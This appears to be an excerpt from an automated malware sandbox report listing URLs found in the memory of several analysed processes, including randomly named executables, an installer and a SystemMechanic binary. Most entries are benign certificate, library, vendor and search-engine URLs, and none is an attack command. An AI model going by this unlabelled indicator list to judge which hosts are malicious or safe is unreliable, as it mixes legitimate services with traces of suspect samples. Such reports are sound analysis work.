Source: Qg_Appv5.exe, 0000000D.00000002.1455543827.00000000072C3000.00000004.00000020.00020000.00000000.sdmp, UniversalInstaller.exe, 00000012.00000002.1388443959.000000000439E000.00000004.00000020.00020000.00000000.sdmp, UniversalInstaller.exe, 00000014.00000002.1475541798.00000000036EB000.00000004.00000020.00020000.00000000.sdmp, cmd.exe, 00000016.00000002.1713305532.00000000052A6000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://sv.symcb.com/sv.crt0
Source: Qg_Appv5.exe, 0000000D.00000002.1455543827.00000000072C3000.00000004.00000020.00020000.00000000.sdmp, UniversalInstaller.exe, 00000012.00000002.1388443959.000000000439E000.00000004.00000020.00020000.00000000.sdmp, UniversalInstaller.exe, 00000014.00000002.1475541798.00000000036EB000.00000004.00000020.00020000.00000000.sdmp, cmd.exe, 00000016.00000002.1713305532.00000000052A6000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://sv.symcd.com0&
Source: zLwT7vCojz.exe, 00000000.00000003.1362288506.0000000006BA6000.00000004.00000020.00020000.00000000.sdmp, u48o.1.exe, 0000000E.00000000.1354291806.000000000041C000.00000020.00000001.01000000.0000000B.sdmp, u48o.1.exe, 0000000E.00000003.1718956588.00000000024FB000.00000004.00001000.00020000.00000000.sdmp, u48o.1.exe, 0000000E.00000003.1718956588.0000000002500000.00000004.00001000.00020000.00000000.sdmp	String found in binary or memory: http://svc.iolo.com/__svc/sbv/DownloadManager.ashx
Source: u48o.1.exe, 0000000E.00000003.1718956588.00000000025C4000.00000004.00001000.00020000.00000000.sdmp, u48o.1.exe, 0000000E.00000003.1718956588.0000000002526000.00000004.00001000.00020000.00000000.sdmp, u48o.1.exe, 0000000E.00000003.1718956588.0000000002589000.00000004.00001000.00020000.00000000.sdmp	String found in binary or memory: http://svc.iolo.com/__svc/sbv/DownloadManager.ashx.
Source: SystemMechanic_5488CB36-BE62-4606-B07B-2EE938868BD1.exe, 0000001A.00000002.2675924617.00000256731F0000.00000004.08000000.00040000.00000000.sdmp	String found in binary or memory: http://svc.iolo.com/__svc/sbv/Uninstall.ashx
Source: Qg_Appv5.exe, 0000000D.00000002.1455543827.0000000007278000.00000004.00000020.00020000.00000000.sdmp, UniversalInstaller.exe, 00000012.00000003.1381447513.00000000048E4000.00000004.00000001.00020000.00000000.sdmp	String found in binary or memory: http://ts-aia.ws.symantec.com/tss-ca-g2.cer0
Source: Qg_Appv5.exe, 0000000D.00000002.1455543827.0000000007278000.00000004.00000020.00020000.00000000.sdmp, UniversalInstaller.exe, 00000012.00000003.1381447513.00000000048E4000.00000004.00000001.00020000.00000000.sdmp	String found in binary or memory: http://ts-crl.ws.symantec.com/tss-ca-g2.crl0(
Source: Qg_Appv5.exe, 0000000D.00000002.1455543827.0000000007278000.00000004.00000020.00020000.00000000.sdmp, UniversalInstaller.exe, 00000012.00000003.1381447513.00000000048E4000.00000004.00000001.00020000.00000000.sdmp	String found in binary or memory: http://ts-ocsp.ws.symantec.com07
Source: SystemMechanic_5488CB36-BE62-4606-B07B-2EE938868BD1.exe, 0000001A.00000000.1530072053.00000256576FB000.00000002.00000001.01000000.00000018.sdmp	String found in binary or memory: http://www.codeplex.com/CompositeWPF
Source: SystemMechanic_5488CB36-BE62-4606-B07B-2EE938868BD1.exe, 0000001A.00000002.2656409195.0000025672900000.00000004.08000000.00040000.00000000.sdmp	String found in binary or memory: http://www.codeplex.com/DotNetZip
Source: SystemMechanic_5488CB36-BE62-4606-B07B-2EE938868BD1.exe, 0000001A.00000000.1530072053.00000256576FB000.00000002.00000001.01000000.00000018.sdmp	String found in binary or memory: http://www.codeplex.com/prism
Source: SystemMechanic_5488CB36-BE62-4606-B07B-2EE938868BD1.exe, 0000001A.00000002.2521152454.0000025659B80000.00000004.08000000.00040000.00000000.sdmp, SystemMechanic_5488CB36-BE62-4606-B07B-2EE938868BD1.exe, 0000001A.00000000.1530072053.00000256576FB000.00000002.00000001.01000000.00000018.sdmp	String found in binary or memory: http://www.codeplex.com/prism#Microsoft.Practices.Prism.ViewModel
Source: SystemMechanic_5488CB36-BE62-4606-B07B-2EE938868BD1.exe, 0000001A.00000002.2651347788.00000256726B0000.00000004.08000000.00040000.00000000.sdmp, SystemMechanic_5488CB36-BE62-4606-B07B-2EE938868BD1.exe, 0000001A.00000002.2520106531.0000025659B50000.00000004.08000000.00040000.00000000.sdmp, SystemMechanic_5488CB36-BE62-4606-B07B-2EE938868BD1.exe, 0000001A.00000002.2643813792.00000256724F0000.00000004.08000000.00040000.00000000.sdmp, SystemMechanic_5488CB36-BE62-4606-B07B-2EE938868BD1.exe, 0000001A.00000002.2656409195.0000025672900000.00000004.08000000.00040000.00000000.sdmp, SystemMechanic_5488CB36-BE62-4606-B07B-2EE938868BD1.exe, 0000001A.00000002.2676980665.0000025673250000.00000004.08000000.00040000.00000000.sdmp, SystemMechanic_5488CB36-BE62-4606-B07B-2EE938868BD1.exe, 0000001A.00000000.1530072053.00000256576FB000.00000002.00000001.01000000.00000018.sdmp	String found in binary or memory: http://www.digicert.com/CPS0
Source: zLwT7vCojz.exe, 00000000.00000003.1362288506.0000000006F92000.00000004.00000020.00020000.00000000.sdmp, Qg_Appv5.exe, 0000000D.00000002.1455543827.00000000072C3000.00000004.00000020.00020000.00000000.sdmp, UniversalInstaller.exe, 00000012.00000002.1388443959.000000000439E000.00000004.00000020.00020000.00000000.sdmp, UniversalInstaller.exe, 00000014.00000002.1475541798.00000000036EB000.00000004.00000020.00020000.00000000.sdmp, cmd.exe, 00000016.00000002.1713305532.00000000052A6000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://www.digicert.com/ssl-cps-repository.htm0
Source: zLwT7vCojz.exe, 00000000.00000003.1362288506.0000000006BA6000.00000004.00000020.00020000.00000000.sdmp, u48o.1.exe, 0000000E.00000003.1718956588.0000000002582000.00000004.00001000.00020000.00000000.sdmp, u48o.1.exe, 0000000E.00000000.1354291806.000000000041C000.00000020.00000001.01000000.0000000B.sdmp	String found in binary or memory: http://www.indyproject.org/
Source: Qg_Appv5.exe, 0000000D.00000002.1455543827.0000000007278000.00000004.00000020.00020000.00000000.sdmp, UniversalInstaller.exe, 00000012.00000002.1388443959.0000000004348000.00000004.00000020.00020000.00000000.sdmp, UniversalInstaller.exe, 00000014.00000002.1475541798.0000000003695000.00000004.00000020.00020000.00000000.sdmp, cmd.exe, 00000016.00000002.1713305532.000000000525D000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://www.info-zip.org/
Source: SystemMechanic_5488CB36-BE62-4606-B07B-2EE938868BD1.exe, 0000001A.00000002.2522422347.0000025659C11000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://www.iolo.com/products/byepass/welcome/?utm_source=bp&utm_medium=product&p=d59cc353-e8e4-4f42-
Source: u48o.0.exe, u48o.0.exe, 0000000A.00000002.1716466376.000000006C26D000.00000002.00000001.01000000.00000016.sdmp	String found in binary or memory: http://www.mozilla.com/en-US/blocklist/
Source: u48o.0.exe, 0000000A.00000002.1700957120.000000001E78A000.00000004.00000020.00020000.00000000.sdmp, u48o.0.exe, 0000000A.00000002.1716032425.0000000061ED3000.00000004.00001000.00020000.00000000.sdmp	String found in binary or memory: http://www.sqlite.org/copyright.html.
Source: Qg_Appv5.exe, 0000000D.00000002.1455543827.00000000072C3000.00000004.00000020.00020000.00000000.sdmp, UniversalInstaller.exe, 00000012.00000002.1388443959.000000000439E000.00000004.00000020.00020000.00000000.sdmp, UniversalInstaller.exe, 00000014.00000002.1475541798.00000000036EB000.00000004.00000020.00020000.00000000.sdmp, cmd.exe, 00000016.00000002.1713305532.00000000052A6000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://www.symauth.com/cps0(
Source: Qg_Appv5.exe, 0000000D.00000002.1455543827.00000000072C3000.00000004.00000020.00020000.00000000.sdmp, UniversalInstaller.exe, 00000012.00000002.1388443959.000000000439E000.00000004.00000020.00020000.00000000.sdmp, UniversalInstaller.exe, 00000014.00000002.1475541798.00000000036EB000.00000004.00000020.00020000.00000000.sdmp, cmd.exe, 00000016.00000002.1713305532.00000000052A6000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://www.symauth.com/rpa00
Source: Qg_Appv5.exe, 0000000D.00000002.1455543827.00000000072C3000.00000004.00000020.00020000.00000000.sdmp, UniversalInstaller.exe, 00000012.00000002.1388443959.000000000439E000.00000004.00000020.00020000.00000000.sdmp, UniversalInstaller.exe, 00000014.00000002.1475541798.00000000036EB000.00000004.00000020.00020000.00000000.sdmp, cmd.exe, 00000016.00000002.1713305532.00000000052A6000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://www.vmware.com/0
Source: Qg_Appv5.exe, 0000000D.00000002.1455543827.00000000072C3000.00000004.00000020.00020000.00000000.sdmp, UniversalInstaller.exe, 00000012.00000002.1388443959.000000000439E000.00000004.00000020.00020000.00000000.sdmp, UniversalInstaller.exe, 00000014.00000002.1475541798.00000000036EB000.00000004.00000020.00020000.00000000.sdmp, cmd.exe, 00000016.00000002.1713305532.00000000052A6000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://www.vmware.com/0/
Source: u48o.0.exe, 0000000A.00000002.1688142273.00000000040DA000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://ac.ecosia.org/autocomplete?q=
Source: u48o.0.exe, 0000000A.00000002.1688142273.00000000040DA000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://cdn.ecosia.org/assets/images/ico/favicon.icohttps://www.ecosia.org/search?q=
Source: u48o.0.exe, 0000000A.00000002.1688142273.00000000040DA000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://ch.search.yahoo.com/favicon.icohttps://ch.search.yahoo.com/search
Source: u48o.0.exe, 0000000A.00000002.1688142273.00000000040DA000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://ch.search.yahoo.com/sugg/chrome?output=fxjson&appid=crmas&command=
Source: Qg_Appv5.exe, 0000000D.00000002.1455543827.00000000072C3000.00000004.00000020.00020000.00000000.sdmp, Qg_Appv5.exe, 0000000D.00000002.1455543827.0000000007278000.00000004.00000020.00020000.00000000.sdmp, UniversalInstaller.exe, 00000012.00000002.1388443959.000000000439E000.00000004.00000020.00020000.00000000.sdmp, UniversalInstaller.exe, 00000012.00000003.1381447513.00000000048E4000.00000004.00000001.00020000.00000000.sdmp, UniversalInstaller.exe, 00000014.00000002.1475541798.00000000036EB000.00000004.00000020.00020000.00000000.sdmp, cmd.exe, 00000016.00000002.1713305532.00000000052A6000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://d.symcb.com/cps0%
Source: Qg_Appv5.exe, 0000000D.00000002.1455543827.00000000072C3000.00000004.00000020.00020000.00000000.sdmp, Qg_Appv5.exe, 0000000D.00000002.1455543827.0000000007278000.00000004.00000020.00020000.00000000.sdmp, UniversalInstaller.exe, 00000012.00000002.1388443959.000000000439E000.00000004.00000020.00020000.00000000.sdmp, UniversalInstaller.exe, 00000012.00000003.1381447513.00000000048E4000.00000004.00000001.00020000.00000000.sdmp, UniversalInstaller.exe, 00000014.00000002.1475541798.00000000036EB000.00000004.00000020.00020000.00000000.sdmp, cmd.exe, 00000016.00000002.1713305532.00000000052A6000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://d.symcb.com/rpa0
Source: SystemMechanic_5488CB36-BE62-4606-B07B-2EE938868BD1.exe, 0000001A.00000002.2522422347.0000025659E43000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://dc.services.visualstudio.com/
Source: SystemMechanic_5488CB36-BE62-4606-B07B-2EE938868BD1.exe, 0000001A.00000002.2658504863.0000025672980000.00000004.08000000.00040000.00000000.sdmp, SystemMechanic_5488CB36-BE62-4606-B07B-2EE938868BD1.exe, 0000001A.00000000.1530072053.00000256576FB000.00000002.00000001.01000000.00000018.sdmp	String found in binary or memory: https://dc.services.visualstudio.com/Jhttps://rt.services.visualstudio.com/Fhttps://profiler.monitor
Source: SystemMechanic_5488CB36-BE62-4606-B07B-2EE938868BD1.exe, 0000001A.00000000.1530072053.00000256576FB000.00000002.00000001.01000000.00000018.sdmp	String found in binary or memory: https://dc.services.visualstudio.com/api/profiles/
Source: SystemMechanic_5488CB36-BE62-4606-B07B-2EE938868BD1.exe, 0000001A.00000002.2658504863.0000025672980000.00000004.08000000.00040000.00000000.sdmp, SystemMechanic_5488CB36-BE62-4606-B07B-2EE938868BD1.exe, 0000001A.00000000.1530072053.00000256576FB000.00000002.00000001.01000000.00000018.sdmp	String found in binary or memory: https://dc.services.visualstudio.com/f
Source: SystemMechanic_5488CB36-BE62-4606-B07B-2EE938868BD1.exe, 0000001A.00000002.2522422347.0000025659E43000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://dc.services.visualstudio.com/v2/track
Source: SystemMechanic_5488CB36-BE62-4606-B07B-2EE938868BD1.exe, 0000001A.00000002.2522422347.0000025659C11000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://download.avira.com/download/
Source: u48o.1.exe, 0000000E.00000003.1718956588.0000000002544000.00000004.00001000.00020000.00000000.sdmp	String found in binary or memory: https://download.iolo.net/sm/24/11A12794-499E-4FA0-A281-A9A9AA8B2685/24.3.0.57/SystemMechanic.exe.46
Source: u48o.1.exe, 0000000E.00000003.1723626996.00000000009D7000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://download.iolo.net/sm/24/11A12794-499E-4FA0-A281-A9A9AA8B2685/24.3.0.57/SystemMechanic.exeeeC
Source: u48o.0.exe, 0000000A.00000002.1688142273.00000000040DA000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://duckduckgo.com/ac/?q=
Source: u48o.0.exe, 0000000A.00000002.1688142273.00000000040DA000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://duckduckgo.com/chrome_newtab
Source: u48o.0.exe, 0000000A.00000002.1688142273.00000000040DA000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://duckduckgo.com/favicon.icohttps://duckduckgo.com/?q=
Source: SystemMechanic_5488CB36-BE62-4606-B07B-2EE938868BD1.exe, 0000001A.00000002.2643813792.00000256724F0000.00000004.08000000.00040000.00000000.sdmp, SystemMechanic_5488CB36-BE62-4606-B07B-2EE938868BD1.exe, 0000001A.00000000.1530072053.00000256576FB000.00000002.00000001.01000000.00000018.sdmp	String found in binary or memory: https://github.com/JamesNK/Newtonsoft.Json
Source: SystemMechanic_5488CB36-BE62-4606-B07B-2EE938868BD1.exe, 0000001A.00000002.2676321887.0000025673230000.00000004.08000000.00040000.00000000.sdmp, SystemMechanic_5488CB36-BE62-4606-B07B-2EE938868BD1.exe, 0000001A.00000002.2658504863.0000025672980000.00000004.08000000.00040000.00000000.sdmp, SystemMechanic_5488CB36-BE62-4606-B07B-2EE938868BD1.exe, 0000001A.00000002.2522422347.0000025659FE2000.00000004.00000800.00020000.00000000.sdmp, SystemMechanic_5488CB36-BE62-4606-B07B-2EE938868BD1.exe, 0000001A.00000002.2620487343.0000025669C2C000.00000004.00000800.00020000.00000000.sdmp, SystemMechanic_5488CB36-BE62-4606-B07B-2EE938868BD1.exe, 0000001A.00000000.1530072053.00000256576FB000.00000002.00000001.01000000.00000018.sdmp	String found in binary or memory: https://github.com/Microsoft/ApplicationInsights-dotnet
Source: SystemMechanic_5488CB36-BE62-4606-B07B-2EE938868BD1.exe, 0000001A.00000002.2676321887.0000025673230000.00000004.08000000.00040000.00000000.sdmp, SystemMechanic_5488CB36-BE62-4606-B07B-2EE938868BD1.exe, 0000001A.00000002.2620487343.0000025669C2C000.00000004.00000800.00020000.00000000.sdmp, SystemMechanic_5488CB36-BE62-4606-B07B-2EE938868BD1.exe, 0000001A.00000000.1530072053.00000256576FB000.00000002.00000001.01000000.00000018.sdmp	String found in binary or memory: https://github.com/Microsoft/ApplicationInsights-dotnetw
Source: SystemMechanic_5488CB36-BE62-4606-B07B-2EE938868BD1.exe, 0000001A.00000000.1530072053.00000256576FB000.00000002.00000001.01000000.00000018.sdmp	String found in binary or memory: https://github.com/itfoundry/Poppins)
Source: SystemMechanic_5488CB36-BE62-4606-B07B-2EE938868BD1.exe, 0000001A.00000002.2660912817.0000025672AE0000.00000004.08000000.00040000.00000000.sdmp	String found in binary or memory: https://github.com/itfoundry/Poppins)&&&&l
Source: SystemMechanic_5488CB36-BE62-4606-B07B-2EE938868BD1.exe, 0000001A.00000002.2660912817.0000025672AE0000.00000004.08000000.00040000.00000000.sdmp	String found in binary or memory: https://github.com/itfoundry/Poppins)&&&&m
Source: SystemMechanic_5488CB36-BE62-4606-B07B-2EE938868BD1.exe, 0000001A.00000002.2660912817.0000025672AE0000.00000004.08000000.00040000.00000000.sdmp, SystemMechanic_5488CB36-BE62-4606-B07B-2EE938868BD1.exe, 0000001A.00000000.1530072053.00000256576FB000.00000002.00000001.01000000.00000018.sdmp	String found in binary or memory: https://github.com/itfoundry/Poppins)&&&&o
Source: SystemMechanic_5488CB36-BE62-4606-B07B-2EE938868BD1.exe, 0000001A.00000002.2660912817.0000025672AE0000.00000004.08000000.00040000.00000000.sdmp, SystemMechanic_5488CB36-BE62-4606-B07B-2EE938868BD1.exe, 0000001A.00000000.1530072053.00000256576FB000.00000002.00000001.01000000.00000018.sdmp	String found in binary or memory: https://github.com/itfoundry/Poppins)&&&&r
Source: SystemMechanic_5488CB36-BE62-4606-B07B-2EE938868BD1.exe, 0000001A.00000002.2660912817.0000025672AE0000.00000004.08000000.00040000.00000000.sdmp, SystemMechanic_5488CB36-BE62-4606-B07B-2EE938868BD1.exe, 0000001A.00000000.1530072053.00000256576FB000.00000002.00000001.01000000.00000018.sdmp	String found in binary or memory: https://github.com/itfoundry/Poppins)&&&&s
Source: SystemMechanic_5488CB36-BE62-4606-B07B-2EE938868BD1.exe, 0000001A.00000002.2660912817.0000025672AE0000.00000004.08000000.00040000.00000000.sdmp, SystemMechanic_5488CB36-BE62-4606-B07B-2EE938868BD1.exe, 0000001A.00000000.1530072053.00000256576FB000.00000002.00000001.01000000.00000018.sdmp	String found in binary or memory: https://github.com/itfoundry/Poppins)&&&&v
Source: SystemMechanic_5488CB36-BE62-4606-B07B-2EE938868BD1.exe, 0000001A.00000002.2660912817.0000025672AE0000.00000004.08000000.00040000.00000000.sdmp, SystemMechanic_5488CB36-BE62-4606-B07B-2EE938868BD1.exe, 0000001A.00000000.1530072053.00000256576FB000.00000002.00000001.01000000.00000018.sdmp	String found in binary or memory: https://github.com/itfoundry/Poppins)&&&&z
Source: SystemMechanic_5488CB36-BE62-4606-B07B-2EE938868BD1.exe, 0000001A.00000000.1530072053.00000256576FB000.00000002.00000001.01000000.00000018.sdmp	String found in binary or memory: https://github.com/microsoft/ApplicationInsights-dotnet/issues/2560
Source: SystemMechanic_5488CB36-BE62-4606-B07B-2EE938868BD1.exe, 0000001A.00000002.2692379137.0000025676C62000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://indiantypefoundry.com
Source: SystemMechanic_5488CB36-BE62-4606-B07B-2EE938868BD1.exe, 0000001A.00000002.2522422347.0000025659C11000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://iolo.azure-api.net/ent/v1
Source: SystemMechanic_5488CB36-BE62-4606-B07B-2EE938868BD1.exe, 0000001A.00000002.2522422347.0000025659C11000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://iolo.comH42652B74-0AD8-4B60-B8FD-69ED38F7666B
Source: SystemMechanic_5488CB36-BE62-4606-B07B-2EE938868BD1.exe, 0000001A.00000000.1530072053.00000256576FB000.00000002.00000001.01000000.00000018.sdmp	String found in binary or memory: https://monitor.azure.com//.default
Source: SystemMechanic_5488CB36-BE62-4606-B07B-2EE938868BD1.exe, 0000001A.00000002.2522422347.0000025659E43000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://profiler.monitor.azure.com/
Source: SystemMechanic_5488CB36-BE62-4606-B07B-2EE938868BD1.exe, 0000001A.00000002.2658504863.0000025672980000.00000004.08000000.00040000.00000000.sdmp, SystemMechanic_5488CB36-BE62-4606-B07B-2EE938868BD1.exe, 0000001A.00000000.1530072053.00000256576FB000.00000002.00000001.01000000.00000018.sdmp	String found in binary or memory: https://profiler.monitor.azure.com/l
Source: SystemMechanic_5488CB36-BE62-4606-B07B-2EE938868BD1.exe, 0000001A.00000002.2522422347.0000025659E43000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://rt.services.visualstudio.com/
Source: SystemMechanic_5488CB36-BE62-4606-B07B-2EE938868BD1.exe, 0000001A.00000002.2658504863.0000025672980000.00000004.08000000.00040000.00000000.sdmp, SystemMechanic_5488CB36-BE62-4606-B07B-2EE938868BD1.exe, 0000001A.00000000.1530072053.00000256576FB000.00000002.00000001.01000000.00000018.sdmp	String found in binary or memory: https://rt.services.visualstudio.com/l
Source: SystemMechanic_5488CB36-BE62-4606-B07B-2EE938868BD1.exe, 0000001A.00000002.2692379137.0000025676C62000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://scripts.sil.org/OFL
Source: SystemMechanic_5488CB36-BE62-4606-B07B-2EE938868BD1.exe, 0000001A.00000000.1530072053.00000256576FB000.00000002.00000001.01000000.00000018.sdmp	String found in binary or memory: https://scripts.sil.org/OFLThis
Source: SystemMechanic_5488CB36-BE62-4606-B07B-2EE938868BD1.exe, 0000001A.00000002.2649497806.00000256725E0000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://scripts.sil.org/OFLV
Source: SystemMechanic_5488CB36-BE62-4606-B07B-2EE938868BD1.exe, 0000001A.00000002.2692379137.0000025676C62000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://scripts.sil.org/OFLX8
Source: SystemMechanic_5488CB36-BE62-4606-B07B-2EE938868BD1.exe, 0000001A.00000000.1530072053.00000256576FB000.00000002.00000001.01000000.00000018.sdmp	String found in binary or memory: https://scripts.sil.org/OFLhttps://indiantypefoundry.comNinad
Source: zLwT7vCojz.exe, 00000000.00000003.1328104582.000000000739E000.00000004.00000020.00020000.00000000.sdmp, Qg_Appv5.exe, 0000000D.00000002.1428757674.0000000004FA9000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://sectigo.com/CPS0
Source: zLwT7vCojz.exe, 00000000.00000003.1362288506.0000000006F92000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://sectigo.com/CPS0D
Source: SystemMechanic_5488CB36-BE62-4606-B07B-2EE938868BD1.exe, 0000001A.00000002.2522422347.0000025659E43000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://snapshot.monitor.azure.com/
Source: SystemMechanic_5488CB36-BE62-4606-B07B-2EE938868BD1.exe, 0000001A.00000002.2658504863.0000025672980000.00000004.08000000.00040000.00000000.sdmp, SystemMechanic_5488CB36-BE62-4606-B07B-2EE938868BD1.exe, 0000001A.00000000.1530072053.00000256576FB000.00000002.00000001.01000000.00000018.sdmp	String found in binary or memory: https://snapshot.monitor.azure.com/&
Source: SystemMechanic_5488CB36-BE62-4606-B07B-2EE938868BD1.exe, 0000001A.00000002.2522422347.000002565A0D0000.00000004.00000800.00020000.00000000.sdmp, SystemMechanic_5488CB36-BE62-4606-B07B-2EE938868BD1.exe, 0000001A.00000002.2522422347.0000025659C11000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://support.iolo.com/support/solutions/articles/44001781185
Source: SystemMechanic_5488CB36-BE62-4606-B07B-2EE938868BD1.exe, 0000001A.00000002.2660912817.0000025672AE0000.00000004.08000000.00040000.00000000.sdmp, SystemMechanic_5488CB36-BE62-4606-B07B-2EE938868BD1.exe, 0000001A.00000000.1530072053.00000256576FB000.00000002.00000001.01000000.00000018.sdmp	String found in binary or memory: https://support.iolo.com/support/solutions/articles/44001781185?
Source: u48o.0.exe, 0000000A.00000003.1458454264.0000000030895000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://support.mozilla.org/kb/customize-firefox-controls-buttons-and-toolbars?utm_source=firefox-br
Source: u48o.0.exe, 0000000A.00000003.1458454264.0000000030895000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://support.mozilla.org/products/firefoxgro.allizom.troppus.S3DiLP_FhcLK
Source: SystemMechanic_5488CB36-BE62-4606-B07B-2EE938868BD1.exe, 0000001A.00000000.1530072053.00000256576FB000.00000002.00000001.01000000.00000018.sdmp	String found in binary or memory: https://taskscheduler.codeplex.com/
Source: SystemMechanic_5488CB36-BE62-4606-B07B-2EE938868BD1.exe, 0000001A.00000000.1530072053.00000256576FB000.00000002.00000001.01000000.00000018.sdmp	String found in binary or memory: https://taskscheduler.codeplex.com/H
Source: SystemMechanic_5488CB36-BE62-4606-B07B-2EE938868BD1.exe, 0000001A.00000002.2522422347.0000025659C11000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://webhooklistenersfunc.azurewebsites.net/api/lookup/constella-dark-web-alerts
Source: SystemMechanic_5488CB36-BE62-4606-B07B-2EE938868BD1.exe, 0000001A.00000002.2522422347.0000025659E43000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://westus2-2.in.applicationinsights.azure.com
Source: SystemMechanic_5488CB36-BE62-4606-B07B-2EE938868BD1.exe, 0000001A.00000002.2522422347.0000025659E43000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://westus2-2.in.applicationinsights.azure.com/
Source: SystemMechanic_5488CB36-BE62-4606-B07B-2EE938868BD1.exe, 0000001A.00000002.2522422347.0000025659C11000.00000004.00000800.00020000.00000000.sdmp, SystemMechanic_5488CB36-BE62-4606-B07B-2EE938868BD1.exe, 0000001A.00000002.2522422347.0000025659E43000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://westus2-2.in.applicationinsights.azure.com/;LiveEndpoint=https://westus2.livediagnostics.mon
Source: SystemMechanic_5488CB36-BE62-4606-B07B-2EE938868BD1.exe, 0000001A.00000002.2522422347.0000025659E43000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://westus2-2.in.applicationinsights.azure.com/v2/track
Source: SystemMechanic_5488CB36-BE62-4606-B07B-2EE938868BD1.exe, 0000001A.00000002.2522422347.0000025659E43000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://westus2.livediagnostics.monitor.azure.com/
Source: zLwT7vCojz.exe, 00000000.00000003.1362288506.0000000006F92000.00000004.00000020.00020000.00000000.sdmp, Qg_Appv5.exe, 0000000D.00000002.1455543827.00000000072C3000.00000004.00000020.00020000.00000000.sdmp, UniversalInstaller.exe, 00000012.00000002.1388443959.000000000439E000.00000004.00000020.00020000.00000000.sdmp, UniversalInstaller.exe, 00000014.00000002.1475541798.00000000036EB000.00000004.00000020.00020000.00000000.sdmp, cmd.exe, 00000016.00000002.1713305532.00000000052A6000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://www.digicert.com/CPS0
Source: u48o.0.exe, 0000000A.00000002.1688142273.00000000040DA000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://www.ecosia.org/newtab/
Source: u48o.0.exe, 0000000A.00000002.1688142273.00000000040DA000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://www.google.com/images/branding/product/ico/googleg_lodp.ico
Source: SystemMechanic_5488CB36-BE62-4606-B07B-2EE938868BD1.exe, 0000001A.00000002.2522422347.000002565A0D0000.00000004.00000800.00020000.00000000.sdmp, SystemMechanic_5488CB36-BE62-4606-B07B-2EE938868BD1.exe, 0000001A.00000002.2522422347.0000025659C11000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://www.iolo.com/company/legal/eula/
Source: SystemMechanic_5488CB36-BE62-4606-B07B-2EE938868BD1.exe, 0000001A.00000002.2660912817.0000025672AE0000.00000004.08000000.00040000.00000000.sdmp, SystemMechanic_5488CB36-BE62-4606-B07B-2EE938868BD1.exe, 0000001A.00000000.1530072053.00000256576FB000.00000002.00000001.01000000.00000018.sdmp	String found in binary or memory: https://www.iolo.com/company/legal/eula/?
Source: SystemMechanic_5488CB36-BE62-4606-B07B-2EE938868BD1.exe, 0000001A.00000002.2522422347.0000025659C11000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://www.iolo.com/company/legal/privacy/
Source: SystemMechanic_5488CB36-BE62-4606-B07B-2EE938868BD1.exe, 0000001A.00000002.2660912817.0000025672AE0000.00000004.08000000.00040000.00000000.sdmp, SystemMechanic_5488CB36-BE62-4606-B07B-2EE938868BD1.exe, 0000001A.00000000.1530072053.00000256576FB000.00000002.00000001.01000000.00000018.sdmp	String found in binary or memory: https://www.iolo.com/company/legal/privacy/?
Source: SystemMechanic_5488CB36-BE62-4606-B07B-2EE938868BD1.exe, 0000001A.00000002.2522422347.0000025659C11000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://www.iolo.com/company/legal/sales-policy/
Source: SystemMechanic_5488CB36-BE62-4606-B07B-2EE938868BD1.exe, 0000001A.00000002.2660912817.0000025672AE0000.00000004.08000000.00040000.00000000.sdmp, SystemMechanic_5488CB36-BE62-4606-B07B-2EE938868BD1.exe, 0000001A.00000000.1530072053.00000256576FB000.00000002.00000001.01000000.00000018.sdmp	String found in binary or memory: https://www.iolo.com/company/legal/sales-policy/?
Source: u48o.0.exe, 0000000A.00000002.1685757276.0000000000447000.00000040.00000001.01000000.00000005.sdmp	String found in binary or memory: https://www.mozilla.org/about/
Source: u48o.0.exe, 0000000A.00000003.1458454264.0000000030895000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://www.mozilla.org/about/gro.allizom.www.jXqaKJMO4ZEP
